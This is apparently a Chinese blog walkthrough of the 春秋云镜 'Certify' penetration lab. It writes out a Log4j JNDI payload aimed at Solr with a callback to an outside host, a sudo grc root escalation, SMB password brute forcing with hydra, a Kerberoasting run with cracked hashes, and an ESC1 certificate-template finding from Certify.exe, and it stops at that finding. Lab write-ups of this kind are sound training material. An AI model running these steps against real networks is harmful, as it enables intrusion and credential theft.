lvzhouhang

春秋云镜-Certify

  • ~26.66K 字
  1. 1. FLAG1
  2. 2. FLAG2
  3. 3. FLAG3&FLAG4

FLAG1

先用fscan扫一扫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.135.211
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-16 11:59:40] [INFO] 暴力破解线程数: 1
[2025-04-16 11:59:40] [INFO] 开始信息扫描
[2025-04-16 11:59:40] [INFO] 最终有效主机数量: 1
[2025-04-16 11:59:41] [INFO] 开始主机扫描
[2025-04-16 11:59:41] [INFO] 有效端口数量: 233
[2025-04-16 11:59:41] [SUCCESS] 端口开放 39.99.135.211:22
[2025-04-16 11:59:41] [SUCCESS] 端口开放 39.99.135.211:80
[2025-04-16 11:59:41] [SUCCESS] 服务识别 39.99.135.211:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-16 11:59:45] [SUCCESS] 端口开放 39.99.135.211:8983
[2025-04-16 11:59:46] [SUCCESS] 服务识别 39.99.135.211:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-04-16 11:59:55] [SUCCESS] 服务识别 39.99.135.211:8983 => [http] 产品:Apache Solr Banner:[HTTP/1.1 302 Found.Location: http://172.22.9.19:8983/solr/.]
[2025-04-16 11:59:55] [INFO] 存活端口数量: 3
[2025-04-16 11:59:55] [INFO] 开始漏洞扫描
[2025-04-16 11:59:55] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-04-16 11:59:55] [SUCCESS] 网站标题 http://39.99.135.211      状态码:200 长度:612    标题:Welcome to nginx!
[2025-04-16 11:59:56] [SUCCESS] 网站标题 http://39.99.135.211:8983 状态码:302 长度:0      标题:无标题 重定向地址: http://39.99.135.211:8983/solr/
[2025-04-16 11:59:57] [SUCCESS] 网站标题 http://39.99.135.211:8983/solr/ 状态码:200 长度:16555  标题:Solr Admin
[2025-04-16 12:00:04] [SUCCESS] 扫描已完成: 5/5

39.99.135.211:8983是一个solr面板,存在log4j漏洞

1
http://39.99.135.211:8983/solr/admin/cores?action=${jndi:ldap://tc94uide908k5qcv0xurpcoorfx6lw9l.oastify.com}

上vps,可以利用java-chains反弹一个shell,反弹的shell如果不舒服可以写一个公钥进去

1
2
3
4
5
6
7
8
solr@ubuntu:/opt/solr$ sudo -l
sudo -l
Matching Defaults entries for solr on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User solr may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/gr

提权sudo grc --pty /bin/sh

1
2
3
solr@ubuntu:~$ sudo grc --pty /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

提权到root后,写一个公钥进去,flag01在/root/flag下,然后上传一个fscan,再做一个代理

FLAG2

查看一下内网的ip端,开扫!

1
2
3
4
5
6
7
8
9
10
11
12
13
root@ubuntu:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:26:2b:c3 brd ff:ff:ff:ff:ff:ff
    inet 172.22.9.19/16 brd 172.22.255.255 scope global dynamic eth0
       valid_lft 315357456sec preferred_lft 315357456sec
    inet6 fe80::216:3eff:fe26:2bc3/64 scope link
       valid_lft forever preferred_lft forever
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
root@ubuntu:/tmp# ./fscan2 -h 172.22.9.19/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-17 00:40:03] [INFO] 暴力破解线程数: 1
[2025-04-17 00:40:03] [INFO] 开始信息扫描
[2025-04-17 00:40:03] [INFO] CIDR范围: 172.22.9.0-172.22.9.255
[2025-04-17 00:40:03] [INFO] 生成IP范围: 172.22.9.0.%!d(string=172.22.9.255) - %!s(MISSING).%!d(MISSING)
[2025-04-17 00:40:03] [INFO] 解析CIDR 172.22.9.19/24 -> IP范围 172.22.9.0-172.22.9.255
[2025-04-17 00:40:03] [INFO] 最终有效主机数量: 256
[2025-04-17 00:40:03] [INFO] 开始主机扫描
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.19     存活 (ICMP)
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.7      存活 (ICMP)
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.26     存活 (ICMP)
[2025-04-17 00:40:03] [SUCCESS] 目标 172.22.9.47     存活 (ICMP)
[2025-04-17 00:40:06] [INFO] 存活主机数量: 4
[2025-04-17 00:40:06] [INFO] 有效端口数量: 233
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:88
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:80
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:80
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:22
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.19:80
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:21
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.19:22
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:445
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.26:445
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:445
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:389
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.47:139
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:139
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.26:139
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.7:135
[2025-04-17 00:40:06] [SUCCESS] 端口开放 172.22.9.26:135
[2025-04-17 00:40:06] [SUCCESS] 服务识别 172.22.9.47:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-04-17 00:40:07] [SUCCESS] 服务识别 172.22.9.47:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-17 00:40:07] [SUCCESS] 服务识别 172.22.9.19:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-17 00:40:11] [SUCCESS] 服务识别 172.22.9.7:88 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.19:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.26:445 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:80 => [http]
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:445 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:389 =>
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.7:139 =>  Banner:[.]
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.26:139 =>  Banner:[.]
[2025-04-17 00:40:12] [SUCCESS] 服务识别 172.22.9.47:80 => [http]
[2025-04-17 00:41:07] [SUCCESS] 服务识别 172.22.9.47:445 =>
[2025-04-17 00:41:07] [SUCCESS] 服务识别 172.22.9.47:139 =>
[2025-04-17 00:41:12] [SUCCESS] 服务识别 172.22.9.7:135 =>
[2025-04-17 00:41:12] [SUCCESS] 服务识别 172.22.9.26:135 =>
[2025-04-17 00:41:12] [INFO] 存活端口数量: 16
[2025-04-17 00:41:12] [INFO] 开始漏洞扫描
[2025-04-17 00:41:12] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-17 00:41:12] [SUCCESS] 网站标题 http://172.22.9.19        状态码:200 长度:612    标题:Welcome to nginx!
[2025-04-17 00:41:12] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
   IPv4地址:
      └─ 172.22.9.26
[2025-04-17 00:41:12] [SUCCESS] 网站标题 http://172.22.9.47        状态码:200 长度:10918  标题:Apache2 Ubuntu Default Page: It works
[2025-04-17 00:41:12] [SUCCESS] 网站标题 http://172.22.9.7         状态码:200 长度:703    标题:IIS Windows Server
[2025-04-17 00:41:12] [SUCCESS] NetBios 172.22.9.7      DC:XIAORANG\XIAORANG-DC
[2025-04-17 00:41:12] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
   IPv4地址:
      └─ 172.22.9.7
[2025-04-17 00:41:12] [SUCCESS] NetBios 172.22.9.26     DESKTOP-CBKTVMO.xiaorang.lab        Windows Server 2016 Datacenter 14393
[2025-04-17 00:41:12] [SUCCESS] SMB认证成功 172.22.9.47:445 administrator:123456
[2025-04-17 00:41:12] [INFO] 系统信息 172.22.9.47 [Windows 6.1]
[2025-04-17 00:41:12] [SUCCESS] NetBios 172.22.9.47     fileserver                          Windows 6.1
[2025-04-17 00:41:12] [INFO] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[2025-04-17 00:41:12] [SUCCESS] 目标: http://172.22.9.7:80
  漏洞类型: poc-yaml-active-directory-certsrv-detect
  漏洞名称:
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/EasonJim/p/6859345.html

上来就扫到域控的漏洞了,但是现在还没有什么可用的信息没办法直接打。

172.22.9.47:445 smb服务存在一个弱口令登陆一下看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[~/Desktop/tmp]
└─# smbclient //172.22.9.47/fileshare -U administrator%123465
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 13 04:12:10 2022
  ..                                  D        0  Wed Jul 13 00:35:09 2022
  personnel.db                        A    61440  Wed Jul 13 03:46:55 2022
  secret                              D        0  Wed Apr 16 11:57:06 2025
  Certified_Pre-Owned.7z              N  9572925  Wed Jul 13 04:12:03 2022
  Certified_Pre-Owned.pdf             N 10406101  Wed Jul 13 04:08:14 2022

                41152812 blocks of size 1024. 36033208 blocks available
smb: \> cd ..
smb: \> ls
  .                                   D        0  Wed Jul 13 04:12:10 2022
  ..                                  D        0  Wed Jul 13 00:35:09 2022
  personnel.db                        A    61440  Wed Jul 13 03:46:55 2022
  secret                              D        0  Wed Apr 16 11:57:06 2025
  Certified_Pre-Owned.7z              N  9572925  Wed Jul 13 04:12:03 2022
  Certified_Pre-Owned.pdf             N 10406101  Wed Jul 13 04:08:14 2022

                41152812 blocks of size 1024. 36033208 blocks available
smb: \> cd secret
smb: \secret\> ls
  .                                   D        0  Wed Apr 16 11:57:06 2025
  ..                                  D        0  Wed Jul 13 04:12:10 2022
  flag02.txt                          N      659  Wed Apr 16 11:57:06 2025

                41152812 blocks of size 1024. 36033208 blocks available

找到flag02了

FLAG3&FLAG4

flag02.txt里还给了一个提示

1
Yes, you have enumerated smb. But do you know what an SPN is?

把所有文件都下载下来看一看,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sqlite> select * from xr_users ;
1|admin|admin
2|******|i9XDE02pLVf
3|******|6N70jt2K9sV
4|******|fiAzGwEMgTY
sqlite> select * from xr_members ;
1|huangmin|1|26|15220647319|huangmin@xiaorang.lab
2|zhangrong|1|36|13073815024|zhangrong@xiaorang.lab
3|liying|1|29|13126874319|liying@xiaorang.lab
4|zhaoli|1|44|13075613024|zhaoli@xiaorang.lab
5|zhangyan|0|35|15254139260|zhangyan@xiaorang.lab
6|zhoujing|1|32|15123481906|zhoujing@xiaorang.lab
7|liuying|1|24|13078310649|liuying@xiaorang.lab
.......

personnel.db里面有用户和3个不知道用户名的密码,先将数据处理一下吧,将xr_users和xr_members的内容分别保存到pass和user里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat pass|awk -F'|' '{print($3)}'>pass.txt

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat pass.txt
admin
i9XDE02pLVf
6N70jt2K9sV
fiAzGwEMgTY
┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat user|awk -F'|' '{print($2)}' >username.txt

┌──(root㉿kali)-[~/Desktop/tmp]
└─# cat username.txt
huangmin
zhangrong
liying
zhaoli
zhangyan
zhoujing
liuying
wanghao
wangqiang
wanglu
zhaoyong
zhangli
wangning
wangyu
...

用hydra爆破,可以爆破出来两个用户

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hydra -L username.txt  -P pass.txt 172.22.9.26 smb
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-16 13:02:49
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1236 login tries (l:309/p:4), ~1236 tries per task
[DATA] attacking smb://172.22.9.26:445/
[445][smb] host: 172.22.9.26   login: zhangjian   password: i9XDE02pLVf
[445][smb] host: 172.22.9.26   login: liupeng   password: fiAzGwEMgTY

然后进行Kerberoast攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName                   Name      MemberOf  PasswordLastSet             LastLogon  Delegation
-------------------------------------  --------  --------  --------------------------  ---------  ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab  zhangxia            2023-07-14 00:45:45.213944  <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS   zhangxia            2023-07-14 00:45:45.213944  <never>
TERMSERV/win2016.xiaorang.lab          chenchen            2023-07-14 00:45:39.767035  <never>



[-] CCache file is not found. Skipping...
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$d0a75403c0fd68eb28e523ec82bbcc13$5d435dfada83bc3decd547576a2e0e533633be1ba2ca116bf3944fce42987d3a695c18247303f24a3f5b295919ed0bd0a682c106b81a1e733cf5b27d8816b85b5506c6cd1c04a7eefb3a12f46c00f1483854c51afb647d8fd064e86bc839305531c7a2cd3639f0b79fe070b1c3d10135ee7fc258f1abecec4bcad5d82c3b6a1031235a312c34e669df79ad94ed4a5ddd19f8919e26d5cbe49108176f7a1f52b21a438be962732cd3c7dfbd709b3ee3b7f0ffd4f8817aef4da2ebd5f2339538a6ee44a6e455a0d0ef760238d871f2a01d742aadf0a6dab09e4dac1b37fa317ef49f0bc9ed332df6a15eceabb304cae0d04df2e349ea41f193c8c41c9bbc8876db2cb6edf7ea19dffcbaa75b2e8cc062d873b7697397ae963d8454d867983429b9a24371a2b7b2ded8bb30454fc5c0c92346d0a00f706a04a3fab6a4dd59760f53107727237a316546634868fc926f582409cad4b4ab5674ef0994c60a1256b9677b9069818967813c3cd508a71e6e10fef1ddcbec756bb24cd1ed1d47ba09bed8d199398bf40cb19ecb0298342ca5eb67091f99a66c1cf2b62cb2fea208df89e75245d570e3e6617889d2c3f65be9c64747c21b2cdae4d1f9b06bdd921c46668c433952d0297d575e04e053e33f6251407793efc6e781406a2342a82d4a1939538883c6dff90f8c7845e140332b37efc66cb4d38f7ad7a4d3c66ef6c2d20b56e8de9a5db8db344e18a72a86f7b0447752356e35f6bc97cf328221921735aa58772dc5b800db10ccd461c95783887ad9a065b7b360365b03e5966f9886fd4b5db3472db78c2a7f514f767984e2944a89912e7d4d0bc8c56e7043b9f4bcebe6ea9d1fe4a6715630f1362b2ae5bf62f25c45d3a9fe2ac85e61728c57d1940f21ed763c403d21794e80bace45f553be48d3d367616d735dfc517573d75a418518e90f28c621b3fc614c1e89a7a7a07056a6a849587666ea91dd6b649d7f73356b8c4807f453b0d3209a52f3b99f81012a76dd0ff159d968dd15ad4c7c035792cd1d56f7c537418a3b466b0f6fa2038b159999f2620b20e14f452d3dee9052fac011c78eb3bff235ea41f85aa82e56c8fca3c626a18255f47c40e3e20ddf3c34083f99e9005b61efaa61f939786a024a86e5f56ee1920a452f7f74a66f8ddbfac75eebfd468bc99b2266d2638d7fbf9dae6ba76b36f97cb452eee2bc129553b5c7725b1dc5a6f91a0d67e9cfb3079024ac0c7379a8b1f6eb76223d021233bf75b8279d7d4b01211dbd4b3baaa1c566b945fd757cbe0e8eee3f7ca8df0e2133848109d16df8fddf6b2e62922c9eca4c980cc6949ed145a146b7d1e2ca5fed6c1b378f4963afb15e8c02120467c33f3b30dec45c39da63c7f847513ea72614af712ccb867c6fb31fc135f9690d543a34f6bba84114d71915c021e9a8ade8a50a96c311940bd680e314f4bc8c5a90376b5a313000d497372e4278713368219da610794a1fe1ff560f6c36f4b31e70b63a06c8
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$756eb4d4a5fe99658d9e4329a03d65a5$7ac1c23cb3d99bb83a38e222924cacfb56f615a4f9b9024b7c8e0879221f744b82ca58662adb97a7a3aa3f7cc6a0095f1b3e8f1cbb2e89433341f2399b12841eba64593a74ce3d6ea849ed9dbb5bda3918470942af00817782299bcb2c44c5b9723aaecf746cf760466f47fdfe5aecf6586e249f0bf305d437747b27e29d2a78d78a897fdb0cfe05a903d35e8e8c31f74091fa6b0886ca297c5ae56b656a67f0dee88e9bcfc8f720f172bfcb8df630ad566a2118f7b862f460fb9a28afee2f3e92069bc8bd3862d0812e3fca7991d851238ca3872cb190d091e3cca90adf4da38d364bc759831d0e61fd2a17864389989b4b1dd49d6ddabc60619d6788947bea7ac1a6040e201e362cbefbff3adb78434a80c66511ef8860493dc94dea833b94bf9b6477a986485e4ee3ab05c91d1ab6ffb8679247bcbfea6c2b51fc15a4ce37ce815e2a7a6185ee09f3bcb05e0c3d31b65d642c3a8cf7546125d03260500675da2efe3c15c234a2bc9f5139a3612d521ad0e8315b3bcde7c3f628c723222c20d19937c8a3497ca4763326686a54c619c2d730e03a6a3247615f4ebde209c7a1e87c1c351fdbf16afb6268755646e14dd2f0ee14a977c4bf1ad0231fc7e4a33ec018e790b5a8d103c9a2ba9f8f0877929c54eda6ffcd936658f2e876273ba5eeef5066ea031c1176bbf365a88e8627f4143173155e5a93920e5722d93054ab1d3596fab388acca607372a94f427a2b7555d6d7e2a0fde397de943b9c34b9d2f9f552dea129a2e1120137ff2a2894e4f19725ad4b282c5be4fe370f428ab9ee0b7bcb30d5ab0a334726edd459ce838630ef6905f6a91640ea3096ca2ebe18691f956c7d017c437aa6219ba880d9948daf8738f30af06b5c6038763dbe9e4b6abf29cdb5ebd742fdf7b334817a29f4a927ce294db573acfb69a7b9b3d4b34e758d0ee3901633c13b15365b3aa50db5cd66ac1a83ed3230dcd3396510eed1554ef6dddd485ae97d4b2385a60833a104672a55b3740a8b57c1f9dfe167fe1e16c6f2c4446c3297ef067441a5a536db4697f979e246cb3abb5aa46a41cc140ccf89b23b503e5975f2cd845e4822a0b1d7b240d6c63e225278745e97c2e32ce7ca1efb2d911c4076911b78fe26adaf5d2289b5e0e76cb0ff50e20e61a8ff76cd0ea14275cb64cb34c219c7a9b4cea7fa0255848fecefa0849a32ffa14f3491e7f83ad092506f123b16df02eb00090e12b2bb5b60291ef8a9d57d6d3fd8505ddf799fa0a56e6309b03f372002090da40e7419e75629c0b518ac4d011b709fcf7866c1a581b7e0a5ac0ae28af906d7b95334c1098eeb3ec94a4e3623b72f60a53182d6f02d60790642400e687954328e1224c473bf010f3c73fd3184269f4cf3d9cb91178a962cb085f3dd45abb794437fbb348904fb12440e7c6ed237d97422ddbde2b0ef6c912a4c4ff86b4153a266f103dd9d69b8806d44e57f0271fa6db4b6b02021a0bdd55ee38323fc9f8d7bbb0a8b

可以拿到两个用户的hash,用hashcat爆破

1
2
3
4
5
6
7
8
9
10
11
12
hashcat  hash /usr/share/wordlists/rockyou.txt
┌──(root㉿kali)-[~/Desktop/tmp]
└─# hashcat  hash --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$2fef93477c96377b81b856c0a918b0f8$7b12ec73692a807cdb959eaeabd253a016b9a6617e9e882016aeba5e5c1f28e4e1d9bb1ce3cfedba110b3c628726b1b50585672544354fae17ec956eff2e27c39494cf3a08d7ab530114273c7d2332866c1483791d6a32b0fea66422abd61412b64b6bd672e30cf844a1da47c8c1cf6791e00abadb34423301ead5ba16fd13631a7a2e29bafaaa9d55a6f9063ef06838953339018d2a077e7c4db47fec5c341c2c53562bf772bd047f5035aade21b9c0c2ad8dc1eec04aa2a1f9e120c6f1508b734895b0ac1cf384ee3b01ffc723b963826221c291f0fbedf92c8f42d549c611b547d1a5bd2cb93c149b8fb01ecc0d785ca8615d49f2d77015c4431d3a122d723936f57e7abb137ce18d22ced5690de6fc3daa6c45f81f97a4427a8c9adb6665eb3ed0010961f38a8860aaaba72a49b67ec435f7ada78ccab514b6c4e465bf0a9b3c14f3e62f580b79d811d2814e3c952dd9a7cacf451632035e1f819a0289913b6f536d317a920b025da509fec7ad356b4d62d892080a87274e2cda87823971f719275afa7b00615cb43e00c586dc09d2f48d909944d352ef0f1b96b74e924c33b4d7a71618c6aaeea94c7b1b61fdc3cbda2b3a0074942a982e7c63258b58ffc74ca532760ad3da4d1b3f5275330457877de4d840477b03c1dbef4ab68bfbfc0400bb63082c9fdc3ca13cc89a8b91846e06d69a8d713aa7e184cc7ed888df935d42580969a9bb00fd61887bd7c55eca669e14ef8705fcb9d5515218c991935c5b37973b363ba58453543a7033e1869d6e1f4304c1887274b04bbe3bea1a24556698ba5fb21218100cfbd73fc5d09e424786f6e64b39e36c7d86b751c502d9f101a368e575c0be0fe4660db85b5d8c13af3c06c870bf3db18e9e7056256d29b153fc6724f6778c8502b763178a34d1fcd67c172d9a943f0a55b972b0d68f0d9507cfbd8acac33d5b340c6db1728a6ff79537e91c9fde40764b79448cf5f122080d770a860baf50a76a08076ac52de4d671cc8bd84f79bda7c0a52988b62a2954f7fe274ab0ad008cdbf8c3710d7d9cd263d9479c3309de5fec18ce56758e056dcfd942500adea9a14da3555e29e9277f8ca07af73299f70472137f7cd045b60f639f14b3bcfcf635c4ec0c0359c4d7238121af36fa7fb29316d4a45890c0973e432fb2b617256cfeec85c8496c506e79c31e4507eaf5ecc7d67540eed5fec810cdcf6d1682156597450c27b27ad617fdf0fd03abe04d181e58cec2af1edc85e243102c8db404aaaca939c42a54d633585eb7e26348ff26951c5cc8c6271d227520fdea38033174b4efddf6a589688223b263e8808fdbc85bbe20ea471fb529216d802776dcc3a7ef68334059213d49640da993c067719c0b119f9c3914295dedefcbd89f0facf3ba3700227de362e49f88302bf87e4cfc5787b364951e3301efa5ff817f5dbf372536ec3aa4:@Passw0rd@

然后用chenchen@xiaorang.lab:@Passw0rd@进行远程桌面登录,用bloodhound进行信息搜集(其实也不用,因为之前fscan已经扫到洞了)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kali)-[~/Desktop/tmp]
└─# bloodhound-python -u chenchen -p @Passw0rd@ -d xiaorang.lab  -c all --dns-tcp -ns 172.22.9.7 --auth-method ntlm --zip
INFO: Found AD domain: xiaorang.lab
INFO: Connecting to LDAP server: xiaorang-dc.xiaorang.lab
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: xiaorang-dc.xiaorang.lab
INFO: Found 95 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DESKTOP-CBKTVMO.xiaorang.lab
INFO: Querying computer: XIAORANG-DC.xiaorang.lab
INFO: Done in 00M 06S
INFO: Compressing output into 20250416132802_bloodhound.zip

上传Certify.exe查找易受攻击的证书

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

C:\Users\chenchen\Desktop\新建文件夹>Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'

    Enterprise CA Name            : xiaorang-XIAORANG-DC-CA
    DNS Hostname                  : XIAORANG-DC.xiaorang.lab
    FullName                      : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Cert Thumbprint               : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
    Cert Serial                   : 43A73F4A37050EAA4E29C0D95BC84BB5
    Cert Start Date               : 2023/7/14 12:33:21
    Cert End Date                 : 2028/7/14 12:43:21
    Cert Chain                    : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
      Allow  ManageCA, ManageCertificates               XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
    Template Name                         : XR Manager
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : 安全电子邮件, 加密文件系统, 客户端身份验证
    mspki-certificate-application-policy  : 安全电子邮件, 加密文件系统, 客户端身份验证
    Permissions
      Enrollment Permissions
        Enrollment Rights           : NT AUTHORITY\Authenticated UsersS-1-5-11
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
                                      XIAORANG\Domain Users         S-1-5-21-990187620-235975882-534697781-513
                                      XIAORANG\Enterprise Admins    S-1-5-21-990187620-235975882-534697781-519
      Object Control Permissions
        Owner                       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
        WriteOwner Principals       : XIAORANG\Administrator        S-1-5-21-990187620-235975882-534697781-500
                                      XIAORANG\Domain Admins        S-1-5-21-990187620-235975882-534697781-512
